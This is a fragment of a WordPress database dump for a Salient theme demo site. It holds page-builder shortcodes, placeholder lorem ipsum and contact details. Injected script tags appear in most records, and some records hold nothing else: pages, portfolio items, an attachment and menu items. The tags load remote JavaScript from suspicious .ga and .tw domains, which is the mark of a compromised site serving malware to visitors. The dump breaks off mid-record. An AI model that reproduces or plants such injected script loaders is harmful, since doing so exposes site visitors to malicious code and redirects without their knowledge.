animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Maecenas congue justo sed euismod tristique. Ut dapibus mauris a neque convallis, sit amet vestibulum eros vestibulum. Aliquam feugiat, sapien non mollis mattis, enim leo pellentesque ante, eget malesuada felis leo suscipit mauris. Proin et volutpat arcu. Nulla sit amet euismod mauris. Praesent eros nunc, ullamcorper eu condimentum sit amet, venenatis sit amet ante. Cras lobortis nisi et nibh consectetur venenatis. Nulla commodo commodo sapien. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Pellentesque at arcu augue. Aenean quam leo, gravida et enim id, laoreet mattis dui. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin sit amet egestas quam, eget consectetur felis.\r\n\r\nVivamus vitae enim ultrices, fermentum nunc eu, euismod sapien. Praesent scelerisque a nisi non tristique. Sed feugiat tempor augue, quis venenatis dui auctor vitae. Proin lacinia, erat non commodo vestibulum, nulla augue tincidunt turpis, et lobortis nulla turpis quis orci. Aenean convallis, lorem eu pretium blandit, erat lectus hendrerit diam, a tempus nisl ante eget dui. Vivamus ut augue in nibh eleifend sollicitudin. Phasellus id bibendum quam. Donec at orci aliquet, gravida neque consequat, pulvinar nisl. Suspendisse ac dolor non eros maximus malesuada a nec est. Nulla in pulvinar lacus. Pellentesque blandit mauris quis scelerisque suscipit. Phasellus condimentum enim diam, ut luctus dolor auctor ut. Praesent malesuada malesuada purus condimentum convallis.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/nvzvOPQW0gc\" bg_position=\"left top\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"fast\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10%\" bottom_padding=\"10%\" id=\"vismis\" color_overlay=\"rgba(10,10,10,0.67)\" overlay_strength=\"0.5\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner equal_height=\"yes\" content_placement=\"middle\" column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_bg_color=\"#3452ff\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"+\" image_1_offset_y=\"0%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_url=\"https://source.unsplash.com/iCtJF-A5hvs/600x400\" image_2_offset_x_sign=\"-\" image_2_offset_x=\"25%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"30%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_url=\"https://source.unsplash.com/nvzvOPQW0gc/600x400\" image_3_offset_x_sign=\"+\" image_3_offset_x=\"15%\" image_3_offset_y_sign=\"-\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Our Commitment\" font_container=\"tag:h5|text_align:left|color:rgba(255%2C255%2C255%2C0.74)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\"][split_line_heading]\r\n<h2>Lipsum Dolor</h2>\r\n[/split_line_heading][vc_custom_heading text=\"Maecenas congue justo sed euismod tristique. Ut dapibus mauris a neque convallis, sit amet vestibulum eros vestibulum. Aliquam feugiat, sapien non mollis mattis, enim leo pellentesque ante, eget malesuada felis leo suscipit mauris. Proin et volutpat arcu. Nulla sit amet euismod mauris. Praesent eros nunc, ullamcorper eu condimentum sit amet, venenatis sit amet ante. Cras lobortis nisi et nibh consectetur venenatis. Nulla commodo commodo sapien. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Pellentesque at arcu augue. Aenean quam leo, gravida et enim id, laoreet mattis dui. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin sit amet egestas quam, eget consectetur felis.\r\n\r\nVivamus vitae enim ultrices, fermentum nunc eu, euismod sapien. Praesent scelerisque a nisi non tristique. Sed feugiat tempor augue, quis venenatis dui auctor vitae. Proin lacinia, erat non commodo vestibulum, nulla augue tincidunt turpis, et lobortis nulla turpis quis orci. Aenean convallis, lorem eu pretium blandit, erat lectus hendrerit diam, a tempus nisl ante eget dui. Vivamus ut augue in nibh eleifend sollicitudin. Phasellus id bibendum quam. Donec at orci aliquet, gravida neque consequat, pulvinar nisl. Suspendisse ac dolor non eros maximus malesuada a nec est. Nulla in pulvinar lacus. Pellentesque blandit mauris quis scelerisque suscipit. Phasellus condimentum enim diam, ut luctus dolor auctor ut. Praesent malesuada malesuada purus condimentum convallis.\" font_container=\"tag:p|text_align:left|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\" css=\".vc_custom_1516234892568{padding-right: 10% !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"philosophy\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\">Our Philosophy</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Maecenas congue justo sed euismod tristique. Ut dapibus mauris a neque convallis, sit amet vestibulum eros vestibulum. Aliquam feugiat, sapien non mollis mattis, enim leo pellentesque ante, eget malesuada felis leo suscipit mauris. Proin et volutpat arcu. Nulla sit amet euismod mauris. Praesent eros nunc, ullamcorper eu condimentum sit amet, venenatis sit amet ante. Cras lobortis nisi et nibh consectetur venenatis. Nulla commodo commodo sapien. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Pellentesque at arcu augue. Aenean quam leo, gravida et enim id, laoreet mattis dui. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin sit amet egestas quam, eget consectetur felis.\r\n\r\nVivamus vitae enim ultrices, fermentum nunc eu, euismod sapien. Praesent scelerisque a nisi non tristique. Sed feugiat tempor augue, quis venenatis dui auctor vitae. Proin lacinia, erat non commodo vestibulum, nulla augue tincidunt turpis, et lobortis nulla turpis quis orci. Aenean convallis, lorem eu pretium blandit, erat lectus hendrerit diam, a tempus nisl ante eget dui. Vivamus ut augue in nibh eleifend sollicitudin. Phasellus id bibendum quam. Donec at orci aliquet, gravida neque consequat, pulvinar nisl. Suspendisse ac dolor non eros maximus malesuada a nec est. Nulla in pulvinar lacus. Pellentesque blandit mauris quis scelerisque suscipit. Phasellus condimentum enim diam, ut luctus dolor auctor ut. Praesent malesuada malesuada purus condimentum convallis.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" item_spacing=\"default\" constrain_max_cols=\"true\" gallery_style=\"3\" load_in_animation=\"none\" img_size=\"500x500\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Our Story','','publish','closed','closed','','our-story','','','2018-01-18 00:21:50','2018-01-18 00:21:50','',0,'http://themenectar.com/demo/salient-corporate/?page_id=19',0,'page','',0),(21,1,'2015-12-30 15:41:09','2015-12-30 15:41:09','[vc_row type=\"full_width_content\" bg_image=\"6082\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"12%\" bottom_padding=\"11%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_row_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" width=\"1/1\"][vc_column_text]\n<h1>Our Selected Work</h1>\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"3%\" overlay_strength=\"0.3\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][nectar_portfolio layout=\"fullwidth\" category=\"all\" project_style=\"6\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Work','','publish','closed','closed','','work','','','2015-12-30 15:41:09','2015-12-30 15:41:09','',0,'http://themenectar.com/demo/salient-corporate/?page_id=21',0,'page','',0),(25,1,'2015-12-30 15:41:20','2015-12-30 15:41:20','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"12%\" color_overlay=\"#005187\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">Let\'s Make Things Happen</h1>\r\n<h6></h6>\r\n[/vc_column_text][nectar_gmap zoom=\"14\" enable_zoom=\"1\" marker_style=\"default\" size=\"600\" map_center_lat=\"-6.1845997\" map_center_lng=\"106.7293611\" map_markers=\"-6.1845997|106.7293611|Our Location\r\n-6.1785997|106.7218513|Our Location 2\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"6%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" bottom_padding=\"15\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6><span style=\"color: #1e83ec;\">Careers</span></h6>\r\n<h2>Want to work for us?</h2>\r\nWe\'re currently in look of a few new designers - If you\'re a passionate worker and think you have what it takes, send your resume and details to <a href=\"#\">jobs@demo.com</a> for all opportunities.[/vc_column_text][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</h2>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact','','publish','closed','closed','','contact','','','2018-01-11 05:09:58','2018-01-11 05:09:58','',0,'http://themenectar.com/demo/salient-corporate/?page_id=25',0,'page','',0),(32,1,'2015-12-30 15:42:59','2015-12-30 15:42:59','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"slider\" category=\"all\" order=\"DESC\" orderby=\"date\" slider_size=\"450\" posts_per_page=\"3\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" id=\"blog\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-full-screen-width\" blog_masonry_style=\"inherit\" category=\"all\" enable_pagination=\"true\" pagination_type=\"infinite_scroll\" load_in_animation=\"fade_in_from_bottom\" order=\"DESC\" orderby=\"date\" posts_per_page=\"10\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','What\'s New','','publish','closed','closed','','whats-new','','','2017-12-14 03:46:30','2017-12-14 03:46:30','',0,'http://themenectar.com/demo/salient-corporate/?page_id=32',0,'page','',0),(62,1,'2015-12-30 20:20:41','2015-12-30 20:20:41','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service A','','publish','closed','closed','','service-a','','','2017-12-10 16:18:29','2017-12-10 16:18:29','',0,'http://themenectar.com/demo/salient-corporate/?post_type=portfolio&#038;p=62',0,'portfolio','',0),(67,1,'2015-12-30 20:10:22','2015-12-30 20:10:22','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service C','','publish','closed','closed','','service-c','','','2017-12-10 16:18:41','2017-12-10 16:18:41','',0,'http://themenectar.com/demo/salient-corporate/?post_type=portfolio&#038;p=67',0,'portfolio','',0),(69,1,'2015-12-30 20:12:46','2015-12-30 20:12:46','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service B','','publish','closed','closed','','service-b','','','2017-12-10 16:18:35','2017-12-10 16:18:35','',0,'http://themenectar.com/demo/salient-corporate/?post_type=portfolio&#038;p=69',0,'portfolio','',0),(92,1,'2015-12-28 23:04:49','2015-12-28 23:04:49','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service E','','publish','closed','closed','','service-e','','','2017-12-10 16:18:52','2017-12-10 16:18:52','',0,'http://themenectar.com/demo/salient-corporate/?post_type=portfolio&#038;p=92',0,'portfolio','',0),(96,1,'2015-12-29 23:06:37','2015-12-29 23:06:37','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service D','','publish','closed','closed','','service-d','','','2017-12-10 16:18:46','2017-12-10 16:18:46','',0,'http://themenectar.com/demo/salient-corporate/?post_type=portfolio&#038;p=96',0,'portfolio','',0),(6144,1,'2016-01-04 01:55:22','2016-01-04 01:55:22','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Curabitur non erat vitae nisi finibus tempor nec eget quam. Donec ornare, risus ac vulputate accumsan, turpis felis mattis elit, tincidunt venenatis nulla neque at lacus. Nulla purus erat, elementum vitae ultricies eget, laoreet viverra augue. Quisque vel fermentum sem. Vivamus eget odio sodales tortor venenatis lobortis sit amet in felis. Pellentesque porttitor nisl erat, a tempor neque elementum quis.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"30\" bottom_padding=\"30\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2>Some cool text here</h2>\r\n[/split_line_heading][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Vestibulum non fermentum dui. Cras tellus leo, vulputate eu ligula et, finibus pretium purus. Mauris vestibulum a quam id elementum. In vitae arcu at nibh vestibulum faucibus. Donec lacus orci, consectetur lacinia convallis eu, cursus vitae eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Nullam vel tortor vitae est lobortis congue. Nullam dignissim leo sit amet metus consectetur, lacinia efficitur felis auctor. In ultrices, diam eget iaculis interdum, diam neque elementum sem, ac laoreet velit sem sit amet nibh.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#444444\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"14%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Sed mollis sagittis arcu ut cursus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vivamus sit amet viverra est, sit amet ullamcorper ante. Aenean est velit, volutpat at convallis in, vulputate tempus lectus. Aenean eget est non nibh vulputate vehicula. Aenean convallis, enim et congue ultrices, tortor quam ultrices felis, aliquet feugiat enim arcu gravida urna. Proin elementum nunc sem, finibus dapibus est porta sit amet. Aenean eget lectus at nulla auctor euismod. Morbi eu faucibus ligula. Nam ac posuere augue. Quisque eleifend interdum libero id luctus.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','News Testing','','publish','open','open','','the-reason-we-decided-to-change-locations','','','2017-12-14 03:44:39','2017-12-14 03:44:39','',0,'http://themenectar.com/demo/salient-corporate/?p=6144',0,'post','',0),(6187,1,'2016-01-06 21:41:47','2016-01-06 21:41:47','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','sample-blog-img','','inherit','open','closed','','sample-blog-img','','','2016-01-06 21:41:47','2016-01-06 21:41:47','',0,'http://sandbox.futuremediatrix.com/medikpro/wp-content/uploads/2013/01/sample-img.png',0,'attachment','image/png',0),(6189,1,'2017-12-10 12:38:25','2017-12-10 12:38:25',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6189','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/',102,'nav_menu_item','',0),(6191,1,'2017-12-10 12:38:25','2017-12-10 12:38:25',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6191','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/',2,'nav_menu_item','',0),(6192,1,'2017-12-10 12:38:25','2017-12-10 12:38:25',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6192','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/',1,'nav_menu_item','',0),(6196,1,'2017-12-10 16:18:29','2017-12-10 16:18:29','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script 